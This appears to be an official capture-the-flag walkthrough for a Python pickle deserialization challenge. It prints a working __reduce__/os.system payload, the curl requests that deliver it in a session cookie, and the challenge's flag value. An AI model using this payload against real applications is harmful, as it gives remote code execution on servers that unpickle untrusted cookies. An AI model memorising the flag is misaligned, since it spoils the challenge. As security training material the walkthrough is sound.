HACKR.GG
hackr.gg — Pickle RCE — Deserialization Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Pickle RCE — Deserialization

Deserialization Attacks · Insecure Deserialization (Python Pickle)
Difficulty
Advanced
Vuln class
Insecure Deserialization (Python Pickle)
Steps
3
// Objective
Craft a malicious Python pickle payload to achieve RCE and read the flag from the server.
// Tools required
PythonBurp Suitecurl
// Step-by-step walkthrough
1
Understand the target
The app deserialises the session cookie using Python's pickle module. Pickle can execute arbitrary code during deserialisation via the __reduce__ method.
2
Craft the malicious pickle payload
Create a Python class with __reduce__ returning os.system with a command that writes the flag to a readable path.
Command / Input
import pickle, os, base64 class Exploit(object): def __reduce__(self): return (os.system, ('cp /flag.txt /tmp/pwn.txt',)) payload = base64.b64encode(pickle.dumps(Exploit())).decode() print(payload)
The payload base64-encodes a pickled object that calls os.system when deserialised.
3
Send the payload and read the flag
Set the session cookie to your base64-encoded payload, make a request (triggering deserialisation), then fetch the output file.
Command / Input
curl http://TARGET/ -H "Cookie: session=BASE64_PAYLOAD" curl http://TARGET/static/pwn.txt
Output
HackrGG{p1ckl3_rc3_d3s3r14l1z3d}
// Flag
Flag value
HackrGG{p1ckl3_rc3_d3s3r14l1z3d}
Written to /tmp/pwn.txt (served at /static/pwn.txt) by the RCE payload.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute